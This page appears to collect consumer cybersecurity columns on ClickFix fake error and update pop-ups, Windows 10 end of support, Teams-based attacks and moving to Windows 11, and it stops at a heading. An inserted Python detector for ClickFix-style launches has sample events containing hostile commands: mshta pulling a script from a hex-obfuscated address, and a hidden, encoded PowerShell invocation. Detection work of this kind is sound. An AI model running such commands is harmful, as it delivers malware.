ReportWire

Tag: windows os

  • Fake error popups are spreading malware fast

    A dangerous cybercrime tool has surfaced in underground forums, making it far easier for attackers to spread malware. 

    Instead of relying on hidden downloads, this tool pushes fake error messages that pressure you into fixing problems that never existed. Security researchers say this method is spreading quickly because it feels legitimate. The page looks broken. The warning feels urgent. The fix sounds simple. 

    That combination is proving alarmingly effective for cybercriminals.

    How fake error malware attacks actually work

    These attacks begin with a compromised website. When a visitor lands on the page, something looks wrong right away. Text appears broken. Fonts look scrambled. Visual elements seem corrupted. A pop-up then appears claiming the issue can be fixed with a browser update or a missing system font. A button offers to repair the problem instantly. 

    Clicking that button copies a command to the clipboard and displays instructions to paste it into PowerShell or a system terminal. That single step launches the infection.

    Fake error popups make a website look broken by scrambling text or fonts to create urgency and panic. (Jens Büttner/picture alliance via Getty Images)

    Why this new tool changes the threat landscape

    The tool behind these attacks is called ErrTraffic. It automates the entire process and removes the technical barriers that once limited cybercrime operations. For about $800, attackers get a full package with a control panel and scripted payload delivery. Analysts at the Hudson Rock Threat Intelligence Team identified the tool after tracking its promotion on Russian-language forums in early December 2025. 

    ErrTraffic works through a simple JavaScript injection. A single line of code connects a hacked site to the attacker’s dashboard. From there, everything adapts automatically. The script detects the operating system and browser. It then displays a customized fake error message in the correct language. The attack works across Windows, Android, macOS and Linux.

    The popups often claim a browser update or missing system font is needed to fix the problem. (Daniel Acker/Bloomberg via Getty Images)

    Why security software struggles to stop it

    Traditional malware defenses look for suspicious downloads or unauthorized installations. ErrTraffic avoids both. Browsers see normal text copying. Security tools see a legitimate system utility being opened manually. Nothing appears out of place. That design allows the attack to slip through protections that would normally stop malware in its tracks.

    The success rate is deeply concerning

    Data pulled from active ErrTraffic campaigns shows conversion rates approaching 60%. That means more than half of the visitors who see the fake error message follow the instructions and install malware. Once active, the tool can deliver infostealers like Lumma or Vidar on Windows devices. Android targets often receive banking trojans instead. The control panel even includes geographic filtering, with built-in blocks for Russia and neighboring regions to avoid drawing attention from local authorities.

    What happens after infection?

    Once malware is installed, credentials and session data are stolen. Those compromised logins are then used to breach additional websites. Each newly hacked site becomes another delivery vehicle for the same attack. That cycle allows the campaign to grow without direct involvement from the original operator.

    Following the on-screen instructions can quietly trigger malware that steals passwords and personal data. (Kurt Knutsson)

    Ways to stay safe from fake error malware

    A few smart habits can significantly reduce risk when facing fake error pop-ups and browser-based traps.

    1) Never run commands suggested by a website

    Legitimate websites never ask you to copy and paste commands into PowerShell or a system terminal. Fake error malware relies on convincing messages that pressure you into doing exactly that. If a page instructs you to run code to fix a problem, close it immediately.

    2) Close pages that claim your system is corrupted

    Fake error campaigns often use broken text, scrambled fonts or warnings about missing files to grab attention. As a result, these visuals create urgency and trigger fear. In reality, a real system problem never announces itself through a random website, so close the page right away.

    3) Install updates only through official system settings

    Real browser and operating system updates come from built-in update tools, not pop-ups on websites. If an update is needed, your device will notify you directly through system settings or trusted app stores.

    4) Install strong antivirus software on every device

    Strong antivirus software can help block malicious scripts, detect infostealers and stop suspicious behavior before damage spreads. This is especially important since fake error malware targets Windows, Android, macOS and Linux systems.

    The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.

    5) Use a data removal service to reduce exposure

    Stolen credentials fuel the spread of fake error malware. Removing personal information from data broker sites can reduce the impact if login details are compromised and limit how far an attack can spread.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    6) Treat font and browser update pop-ups with suspicion

    Claims about missing fonts or outdated browsers are a hallmark of these attacks. Modern systems manage fonts automatically, and browsers update themselves. A webpage has no reason to request manual fixes.

    If a real update is needed, the operating system will request it directly. A random webpage never should.

    Kurt’s key takeaways 

    Fake error malware works because it plays on a very human reaction. When something on a screen suddenly looks broken, most people want to fix it fast and move on. That split-second decision is exactly what attackers are counting on. Tools like ErrTraffic show how polished these scams have become. The messages look professional. The instructions feel routine. Nothing about the moment screams danger. But behind the scenes, one click can quietly hand over passwords, banking access and personal data. The good news is that slowing down makes a real difference. Closing a suspicious page and trusting built-in system updates can stop these attacks cold. When it comes to pop-ups claiming your device is broken, walking away is often the smartest fix.

    Have you ever seen a pop-up or error message that made you stop and wonder if it was real? Tell us what it looked like and how you handled it by writing to us at Cyberguy.com.

    Copyright 2025 CyberGuy.com. All rights reserved.

  • Fake Windows update pushes malware in new ClickFix attack

    Cybercriminals keep getting better at blending into the software you use every day. 

    Over the past few years, we’ve seen phishing pages that copy banking portals, fake browser alerts that claim your device is infected and “human verification” screens that push you to run commands you should never touch. The latest twist comes from the ongoing ClickFix campaign.

    Instead of asking you to prove you are human, attackers now disguise themselves as a Windows update. It looks convincing enough that you might follow the instructions without thinking, which is exactly what they want.

    The malware hides inside seemingly normal image files, using steganography to slip past traditional security tools.  (Microsoft)

    How the fake update works

    Researchers noticed that ClickFix has upgraded its old trick. The campaign used to rely on human verification pages, but now you get a full-screen Windows update screen that looks almost identical to the real thing. Joe Security showed how the page displays fake progress bars, familiar update messages and a prompt that tells you to complete a critical security update.

    If you are on Windows, the site tells you to open the Run box, copy something from your clipboard and paste it in. That “something” is a command that silently downloads a malware dropper. The final payload is usually an infostealer, which steals passwords, cookies and other data from your machine.

    Fake update screens are getting harder to spot as attackers mimic Windows with near-perfect precision. (Joe Security)

    The moment you paste the command, the infection chain begins. First, a file called mshta.exe reaches out to a remote server and grabs a script. To avoid detection, these URLs often use hex encoding for parts of the address and rotate their paths. The script then runs obfuscated PowerShell code filled with junk instructions to throw researchers off. Once PowerShell does its work, it decrypts a hidden .NET assembly that functions as the loader.
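
    One way to hunt for the first stage of this chain, and for the paste-into-PowerShell step of the fake error pop-ups covered earlier on this page, is to score process-creation events. This is an added example, not code from the article or the researchers it cites; the event field names, weights, threshold and every sample event are constructed, and it assumes "hex encoding" shows up as hex-written host labels in the URL.

```python
import re
from urllib.parse import urlsplit

# First-stage programs named in the article. A command pasted into the Run box
# is started by the desktop shell, so its parent process is explorer.exe.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe"}
SHELL_PARENTS = {"explorer.exe"}
ALERT_THRESHOLD = 4  # assumed cut-off for this example; tune on real telemetry

URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)
HEX_LABEL_RE = re.compile(r"0x[0-9a-f]+", re.IGNORECASE)
# PowerShell accepts abbreviated switches: -w / -WindowStyle hidden,
# -e / -enc / -EncodedCommand followed by a base64 string.
PS_HIDDEN_RE = re.compile(r"(?<![\w-])-w[a-z]*\s+h[a-z]*\b", re.IGNORECASE)
PS_ENCODED_RE = re.compile(
    r"(?<![\w-])-e(?:c|nc[a-z]*)?\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE
)

# Constructed events shaped like process-creation telemetry. Field names are
# assumptions, addresses are documentation ranges, the base64 is a placeholder.
SAMPLE_EVENTS = [
    {"host": "WS-014", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://203.0x0.113.7/a1b2/update"},
    {"host": "WS-022", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwA"},
    {"host": "WS-031", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # user opened a console by hand
    {"host": "SRV-002", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass "
                     r"-File C:\Scripts\inventory.ps1"},  # scheduled admin job
    {"host": "WS-040", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hex_encoded_host(url):
    """True when any dot-separated label of the URL host is written in hex."""
    try:
        host = urlsplit(url).hostname or ""
    except ValueError:  # malformed URL: nothing to judge
        return False
    return any(HEX_LABEL_RE.fullmatch(label) for label in host.split("."))


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    image = basename(event["image"])
    if image not in SCRIPT_HOSTS:
        return 0, []
    cmd = event["command_line"]
    urls = URL_RE.findall(cmd)
    hits = []
    if basename(event["parent_image"]) in SHELL_PARENTS:
        hits.append((1, "script host launched from explorer.exe (Run box or paste)"))
    if urls:
        hits.append((3 if image == "mshta.exe" else 2, f"{image} given a remote URL"))
    if any(hex_encoded_host(u) for u in urls):
        hits.append((3, "URL host has a hex-encoded label"))
    if image == "powershell.exe":
        if PS_HIDDEN_RE.search(cmd):
            hits.append((2, "hidden window requested"))
        if PS_ENCODED_RE.search(cmd):
            hits.append((2, "encoded command passed on the command line"))
    return sum(w for w, _ in hits), [r for _, r in hits]


def triage(events, threshold=ALERT_THRESHOLD):
    """Events at or above the threshold, highest score first."""
    alerts = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"host": event["host"], "score": score, "reasons": reasons})
    return sorted(alerts, key=lambda a: -a["score"])


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["host"], alert["score"], "; ".join(alert["reasons"]))
```

    A console opened by hand or a scheduled admin script stays below the threshold, because the explorer.exe parent counts for little unless a remote URL, hidden window or encoded command accompanies it.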

    Why is this attack so hard to detect?

    The loader hides its next stage inside what looks like a regular PNG file. ClickFix uses custom steganography, which is a technique that hides secret data inside normal-looking content. In this case, the malware sits inside the image’s pixel data. The attackers tweak color values in certain pixels, especially in the red channel, to embed pieces of shellcode. When you view the image, everything appears normal.

    The script knows exactly where the hidden data sits. It extracts the pixel values, decrypts them and rebuilds the malware directly in memory. That means nothing obvious is written to disk. Security tools that rely on file scanning miss it, since the shellcode never appears as a standalone file.

    Once rebuilt, the shellcode is injected into a trusted Windows process like explorer.exe. The attack uses familiar in-memory techniques such as VirtualAllocEx, WriteProcessMemory and CreateRemoteThread. Recent ClickFix activity has delivered infostealers like LummaC2 and updated versions of Rhadamanthys. These tools are built to harvest credentials and send them back to the attacker with very little noise.

    Once the hidden code loads into a trusted Windows process, infostealers quietly begin harvesting your data. (Kurt “CyberGuy” Knutsson)

    7 steps you can take to protect yourself from the ClickFix campaign

    The best way to stay protected is to slow down for a moment and follow a few steps that cut off these attacks before they start.

    1) Never run commands you didn’t ask for

    If any site tells you to paste a command into Run, PowerShell or Terminal, treat it as an immediate warning sign. Real operating system updates never require you to run commands from a webpage. When you run that command, you hand full control to the attacker. If something feels off, close the page and don’t interact further.

    2) Keep Windows updates inside Windows

    Updates should only come from the Windows Settings app or through official system notifications. A browser tab or pop-up pretending to be a Windows update is always fake. If you see anything outside the normal update flow asking for your action, ignore it and check the real Windows Update page yourself.

    3) Use a reputable antivirus

    Choose a security suite that can detect both file-based and in-memory threats. Stealthy attacks like ClickFix avoid leaving obvious files for scanners to pick up. Tools with behavioral detection, sandboxing and script monitoring give you a much better chance of spotting unusual activity early.

    The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.

    4) Use a password manager

    Password managers create strong, unique passwords for every account you use. They also autofill only on legitimate websites, which helps you catch fake login pages. If a manager refuses to fill out your credentials, take a second look at the URL before entering anything manually.

    Next, see if your email has been exposed in past breaches. Our No. 1 password manager pick includes a built-in breach scanner that checks whether your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

    Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.

    5) Use a personal data removal service

    Many attacks start by targeting emails and personal details already exposed online. Data removal services help shrink your digital footprint by requesting takedowns from data broker sites that collect and sell your information. They can’t erase everything, but reducing your exposure means fewer attackers have easy access to your details.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    6) Check URLs before trusting anything

    A convincing layout doesn’t mean it is legitimate. Always look at the domain name first. If it doesn’t match the official site or uses odd spelling or extra characters, close it. Attackers rely on the fact that people recognize a page’s design but ignore the address bar.

    7) Close suspicious full-screen pages

    Fake update pages often run in full-screen mode to hide the browser interface and make the page look like part of your computer. If a site suddenly goes full screen without your permission, exit with Esc or Alt+Tab. Once you’re out, scan your system and don’t return to that page.

    Kurt’s key takeaway

    ClickFix works because it leans on user interaction. Nothing happens unless you follow the instructions on the screen. That makes the fake Windows update page especially dangerous, because it taps into something most people trust. If you are used to Windows updates freezing your screen, you may not question a prompt that appears during the process. Cybercriminals know this. They copy trusted interfaces to lower your guard and then rely on you to run the final command. The technical tricks that follow are complex, but the starting point is simple. They need you to help them.

    Do you ever copy commands from a website without thinking twice about what they do? Let us know by writing to us at Cyberguy.com.

    Copyright 2025 CyberGuy.com.  All rights reserved.

  • Windows 10 users face ransomware nightmare as Microsoft support ends in 2025 worldwide

    Microsoft’s blog recently gave a firm warning: unsupported systems aren’t just outdated, they’re unprotected. That message targets anyone still using Windows 10, and it’s serious. According to Microsoft’s Digital Defense Report, over 90% of ransomware attacks hit unsupported PCs. That statistic alone should make every Windows 10 user think twice.

    When an operating system stops receiving updates, it becomes an open door for hackers. Security patches dry up, and vulnerabilities grow. So while your computer might seem fine today, it could already be compromised without your knowledge.

    Why are unsupported systems dangerous?

    Unsupported Windows 10 systems no longer get the updates that keep you safe. Without those patches, ransomware and malware have easy access to your files. Once inside, attackers can encrypt your personal data or steal credentials and banking details.

    It’s not just about losing files. Identity theft and financial fraud often start with outdated systems. The older the software, the easier it is for cybercriminals to exploit weaknesses that will never be fixed.

    The “just one more year” trap

    Many people tell themselves they’ll upgrade later. Microsoft calls this “just one more year” thinking. The problem is that every delay increases your risk. Extended security updates only offer limited coverage, and they don’t stop new types of attacks.

    Without Microsoft’s regular monitoring, new vulnerabilities stay hidden. You could be using your computer for months while attackers quietly collect your data. That’s a frightening thought, especially when most of it can be prevented by upgrading.

    Upgrading to Windows 11 keeps your system protected with ongoing security updates. (Microsoft)

    The hidden costs of waiting to upgrade to Windows 11

    It’s easy to think upgrading costs too much. But what about the cost of losing your photos, business files or financial information? Data recovery, fraud resolution and downtime can cost far more than a new device.

    Hackers know users delay updates, and they actively look for outdated systems. Even one unsupported device in a home or office network can create a weak spot that exposes everything else.

    How to stay safe from unsupported Windows 10 security risks

    You can protect yourself right now with a few smart steps. These actions reduce your exposure, tighten your online defenses and prepare you for a smooth upgrade to Windows 11. The good news is that most of these changes only take a few minutes but make a major difference in your security.

    1) Upgrade your system to Windows 11

    Start by checking whether your PC can handle Windows 11. Most modern AMD and Intel processors already meet the system requirements. Upgrading keeps your computer protected with ongoing updates that patch vulnerabilities and improve overall performance. It’s one of the simplest ways to defend against ransomware and malware before they strike.

    2) Watch out for phishing scams and install strong antivirus software

    Be cautious with every link and attachment you receive. Cybercriminals love sending fake update notifications that look like official Microsoft messages. These phishing scams often contain malicious links that install malware in seconds. Before you click, hover over links to verify their source and only download updates directly from Microsoft’s official site. To add an extra layer of protection, install strong antivirus software that can detect and block malicious files before they infect your system.

    The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Delaying your Windows 11 upgrade only gives cybercriminals more time to strike. (Photographer: Chona Kasinger/Bloomberg via Getty Images)

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.

    3) Use a data removal service

    Use a personal data removal service to take your information off people-search and data broker websites. These services help remove your name, address, phone number and other personal details that scammers often use for phishing or social-engineering attacks. By limiting what’s publicly available about you, you make it much harder for cybercriminals to target you, especially if your older, unsupported Windows 10 system is ever exposed online.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    4) Secure your logins

    Strong logins make a huge difference. Turn on two-factor authentication (2FA) for your most sensitive accounts, such as banking and email. Also, create strong passwords for your accounts and devices, and avoid using the same password for multiple online accounts. Consider using a password manager, which securely stores and generates complex passwords, reducing the risk of password reuse. This extra layer stops hackers, even if they manage to steal a password.

    Next, see if your email has been exposed in past breaches. Our #1 password manager pick (see Cyberguy.com) includes a built-in breach scanner that checks whether your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords, and secure those accounts with new, unique credentials.

    Without Windows updates, hidden vulnerabilities give hackers easy access to your data. (Felix Zahn/Photothek via Getty Images)

    Check out the best expert-reviewed password managers of 2025 at Cyberguy.com

    5) Back up your data regularly

    Think of backups as your safety net. Save copies of important files to an external hard drive or a trusted cloud service. Schedule automatic backups so you don’t have to remember to do it yourself. If your PC ever gets locked by ransomware, a clean backup means you can restore everything without paying a cent.

    6) Stay informed and proactive

    Cyber threats evolve every day, and knowledge is your best defense. Keep an eye on official Microsoft announcements and alerts. Small changes, like applying updates quickly and revisiting your privacy settings, can keep you a step ahead of attackers.

    Kurt’s key takeaways

    Unsupported systems might look harmless, but they create silent risks that grow over time. Every day you stay on Windows 10 after support ends, you depend on luck instead of protection. Upgrading isn’t just about staying current; it’s about keeping your data safe and your privacy intact.

    Is holding on to Windows 10 worth risking everything stored on your computer? Let us know by writing to us at Cyberguy.com.

    Copyright 2025 CyberGuy.com. All rights reserved.

  • Microsoft sounds alarm as hackers turn Teams platform into ‘real-world dangers’ for users

    Microsoft is sounding the alarm, and this time, the warning hits home for everyday users. Hackers are now turning Microsoft Teams security threats into real-world dangers that go far beyond corporate networks. Using Teams, cybercriminals gather intel, pose as trusted contacts, trick people into sharing private data and even spread malware that can steal passwords or lock up personal files. 

    What was once a simple video chat and collaboration tool has become a high-value target for cybercriminals and even state-backed hackers. Whether you use Teams for work, school or staying in touch, the risks are real and growing. We’ll break down how attackers abuse Teams, what Microsoft recommends and the simple steps you can take to protect yourself at home or on the job.

    How hackers use Teams to attack

    Hackers exploit Microsoft Teams at every stage of an attack, using it to spy, impersonate, spread malware and even control compromised systems, and consumers are now in their sights, too.

    Hackers are finding new ways to weaponize Microsoft Teams, turning everyday chats into dangerous entry points. (David Becker/Getty Images)

    Reconnaissance via Teams

    Attackers start by probing Teams environments to find weak spots. They look for users with open settings, public profiles or external meeting links. Microsoft warns that “anonymous participants, guests and external access users” can give hackers a way in. If your Privacy Mode is off, they can see when you’re online, send unwanted chats, or try to join meetings outside your group, even if you’re just using a free account.

    Persona building & impersonation

    Hackers often pretend to be someone you trust, like an IT admin, a coworker or even a Microsoft representative. They create fake profiles and logos that look convincing to trick you into clicking a link or sharing credentials. Microsoft says attackers “take advantage of the same resources as legitimate organizations” to pull off their scams.

    Initial access & malware delivery

    Once they’ve earned your trust, hackers send a chat or call that includes a malicious link or file. You might get a message saying, “Your Teams account needs verification” or “Update required for better security.” It’s all bait. These links can install spyware, steal logins or deliver ransomware that locks up your data, whether you’re on a company laptop or your personal PC at home.

    Persistence & lateral movement

    After breaking in, attackers try to stay hidden. They might add guest accounts, install shortcuts or change permissions so they can come back later. In some cases, they use the same Microsoft tools meant for admins to move across Teams, OneDrive or even your personal files stored in the cloud.

    Command & control & data exfiltration

    Once inside, hackers can send commands through Teams messages or hide malware in shared links. They’ve even been known to send ransom demands directly through Teams chat. Microsoft says one group, Octo Tempest, used Teams to taunt victims and pressure them into paying up, showing how personal these attacks can get.

    Tips to stay protected

    You don’t need to be a cybersecurity expert to stay safe on Microsoft Teams. A few smart tools and habits can go a long way in keeping hackers, scammers and snoops from taking advantage of your information.

    1) Enable privacy mode

    Keep your online presence private. Turn on Privacy Mode in Teams to stop strangers from seeing when you’re active or trying to join meetings. It’s a simple setting that makes it harder for hackers to target you or your company.

    2) Be careful with roles and permissions

    If you share your Teams account with coworkers or family members, don’t give everyone full control. Keep admin access limited to one trusted person. This reduces the chance of someone accidentally approving a scam link or letting malware spread.

    3) Use a data removal service

    Hackers often rely on personal details found online to make their scams more convincing, things like your job title, workplace or even who you’ve video-chatted with. That information helps them build fake Teams profiles or send messages that look legitimate. Using a personal data removal service helps wipe your private details from data broker sites, cutting off one of the main sources hackers use to impersonate you. The less they can learn about you, the harder it is for them to trick you into trusting a fake message or clicking a malicious link.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    There are attack techniques used to compromise people. (Kurt “CyberGuy” Knutsson)

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    4) Double-check links and files, plus use strong antivirus software

    Hackers love to send fake messages pretending to be support or IT help. Never open links or attachments from people you don’t recognize, even if the message looks official. Use strong antivirus software to automatically scan downloads and attachments before you open them.

    The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.

    5) Limit guest access

    Only allow trusted guests into your Teams chats and meetings. If you invited someone for a one-time project, remove them afterward. Tight control over who can join helps prevent impersonators from slipping in unnoticed.

    6) Turn on alerts

    Activate Teams alerts to catch anything unusual, like sign-ins from new devices or unexpected permission changes. Pair that with your antivirus program’s real-time protection to get notified if malicious activity starts on your device.

    7) Think “zero trust”

    Zero Trust means verifying every user, every time. Don’t assume messages or calls are legitimate, especially if someone asks for a password or authentication code. If you’re unsure, contact your company’s IT team or verify the person’s identity through a separate channel.

    8) Practice spotting phishing attempts

    Hackers rely on panic and urgency to make you click. If you get a message claiming your account will be locked or that support needs your password, pause. Report suspicious messages to Microsoft or your security provider. Regular phishing awareness training helps you spot scams faster.

    9) Keep everything updated

    Always install the latest Teams and operating system updates. Patches fix security holes that hackers exploit to sneak in.

    Cybercriminals often impersonate IT support or trusted colleagues to trick users into sharing credentials. (CyberGuy.com)

    Kurt’s key takeaways

    Microsoft’s warning about Teams is a reminder that hackers are always searching for new ways to reach you, even through apps you use every day. What makes these attacks so dangerous is their familiarity. Messages look normal, video calls seem real, and fake tech support chats can sound convincing. That’s why awareness, not fear, is your strongest defense. With privacy settings enabled, antivirus protection running, and a reliable personal data removal service scrubbing your info from the web, you’re already several steps ahead of scammers. Staying alert to phishing attempts and keeping your software up to date can turn Teams back into what it’s meant to be: a safe, helpful way to stay connected.

    If attackers can weaponize your day-to-day communication platform, how confident are you that your Teams environment is truly safe? Let us know by writing to us at Cyberguy.com.

    Copyright 2025 CyberGuy.com.  All rights reserved.  


  • Windows 10 support ends: Upgrade to Windows 11 safely

    With Microsoft ending support for Windows 10 this October, many people are racing to upgrade. Catherine, a longtime HP desktop user, shared her concerns with us: “I need to purchase a new/updated computer with Windows 11 pretty darn quick. I’ve utilized HP desktops for years and would prefer to continue to do so. My concern deals with transferring everything from one computer to another, made more interesting since my husband and I have separate setups and log-ins. I had a My Passport running, but now I believe a lot is in the cloud. We are concerned about losing our emails/contacts, etc. I also use various programs for a couple of groups I’m involved with (Word, PowerPoint, Excel, Adobe Acrobat, etc.), which I cannot afford to lose. Any guidance for a smooth transition would be great.”

    If this sounds familiar, you’re not alone. The good news: you can move everything to a new HP computer running Windows 11 with the right preparation and tools. Here’s a step-by-step guide.

    Microsoft will end support for Windows 10 this month. (Microsoft)

    What to prepare before you buy a new computer

    Before you switch to a new Windows 11 PC, take these steps to organize your files, programs and accounts, so the move goes as smoothly as possible.

    1) Inventory what you have and make sure it’s backed up.

    • List the programs/software you use (Word, PowerPoint, Excel, Acrobat, etc.), including any license/activation info.
    • Find where your data is: local hard drive, external My Passport drive or cloud (OneDrive, Google Drive, etc.).
    • Make sure you have backups of anything that’s only local.

    2) Check how your email is set up.

    • If it’s a Microsoft/Outlook/Exchange account, a lot may already be stored in the cloud. Outlook contacts/calendars may sync automatically depending on how your accounts are configured.
    • If you use POP (email downloaded locally), or “local only” Outlook data (.pst files), you’ll need to move those manually.

    3) Have your login accounts ready.

    • Know your Microsoft account credentials (if you use one).
    • Know admin passwords for existing software.

    4) Gather license keys/software installers.

    • For paid apps (Adobe Acrobat etc.), make sure you have install files or know how to re-download, plus activation keys.
    • Make a note of any special settings or plugins you use so they get restored.

    Choosing the right computer for your needs 

    When choosing a new HP computer, confirm it runs Windows 11 out of the box. Pick a model with enough storage to hold all your files and plenty of RAM for multitasking. If you rely on external drives, make sure the new computer has the right ports, like USB-C or USB 3.0.

    You can browse CyberGuy’s best laptop picks or best desktop computers for solid options at Cyberguy.com. If you mainly use your computer for email, browsing, or video calls, a tablet, Chromebook, or iPad might be all you need. They’re low-maintenance, secure, and often more affordable than a new Windows laptop.

    Windows 11 and Windows 10 operating system logos are displayed on laptop screens. Krakow, Poland, on Feb. 3, 2022.  (Beata Zawrzel/NurPhoto)

    Step-by-step: Migrating to the new Windows 11 computer 

    Moving to a new PC takes planning, but following these steps will help you transfer your files, programs and settings safely. This is especially important if you and your spouse use separate logins.

    Back up everything

    Start by backing up your personal files, documents, pictures and desktop to both your external drive and a cloud service like OneDrive. If you use Outlook, export your email, contacts, and calendar if needed.

    • For POP or local .pst files, go to File → Open & Export → Export → Outlook Data File (.pst) and make a copy.
    • For IMAP or Exchange accounts, confirm that everything has synced properly online.

    Back up Windows and settings

    Use Windows Backup or the built-in tools to save your settings and user folders. Apply the latest Windows updates on the old PC before making the switch.

    Set up the new PC

    When you turn on your new computer, sign in with your Microsoft account if you have one. This helps sync certain settings automatically. Reinstall your Office apps, Adobe Acrobat, and any other software using your license keys or installers.

    Transfer data and settings

    If both PCs are connected and supported, you can use Windows Backup’s “Transfer information to a new PC” option. Simply pair them and choose what to move. If that’s not an option, copy backups from your external drive or cloud storage onto the new computer. Restore email by importing your .pst file if required.

    Verify everything works

    Open your key programs to confirm licensing is valid. Check that your email, contacts and calendar are functioning correctly. Go through your files to make sure nothing is missing.

    Set up backup and ongoing sync

    Once you’re up and running, turn on OneDrive or your preferred cloud service to sync important folders like Documents and Desktop. Finally, create a regular backup plan using either your external drive or the cloud, so your new PC stays protected.

    Common problems to avoid

    Some users run out of space on their new PC because they underestimated how much data they had. Others lose email when they forget to export .pst files. License activation can also cause headaches if the software is tied to the old machine, so always deactivate before reinstalling. And remember that older programs may not work perfectly on Windows 11, so check compatibility in advance.

    Tools that can help

    • Third-party software: Transfers files, settings and some installed apps automatically. For our picks, search “First 10 things to do if you got a new PC” on Cyberguy.com.
    • Windows Backup and Transfer: Free but may require reinstalling programs manually.
    • External hard drive backup: Still the simplest safety net for keeping copies of your important files. Copy everything important to your external drive as a safety measure before migrating.

    Experts recommend backing up your files to an external hard drive or a cloud service before making the switch. (Kurt “CyberGuy” Knutsson)

    How long the process takes

    Upgrading to a new computer isn’t instant, but knowing the timeline helps you plan your day. On average, you can expect the transition to take most of an afternoon. Here’s what it looks like step by step:

    Choose and order your new PC: Browsing, comparing models and making the purchase usually takes one to two hours.

    Initial setup and Windows updates: When the new computer arrives, the first startup and applying all current Windows updates can take another one to two hours.

    Install key programs: Installing Microsoft Office apps and Adobe Acrobat typically requires about one hour, depending on download speed and license activation.

    Back up data on your old PC: Creating backups of your documents, photos and email accounts usually takes one to three hours. The exact time depends on how much data you have and whether you use an external drive or the cloud.

    Transfer data and settings: Moving files, Outlook .pst backups and Windows settings to the new computer often takes one to two hours.

    Verify that everything works: Allow about an hour to test your programs, check your email and contacts, and confirm that none of your files were left behind.

    Reconnect devices and tweak settings: Finally, plan for 30 to 60 minutes to reconnect printers, set up Bluetooth accessories and customize your desktop and preferences.

    When you add it all together, the full migration can take anywhere from six to ten hours spread over a day. While it requires patience, completing each step carefully ensures that your new Windows 11 computer runs smoothly without losing important data.

    Pro tip: Once your new PC is ready, don’t forget security. Install strong antivirus software right away. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android & iOS devices at Cyberguy.com/LockUpYourTech 

    What to do with your old PC

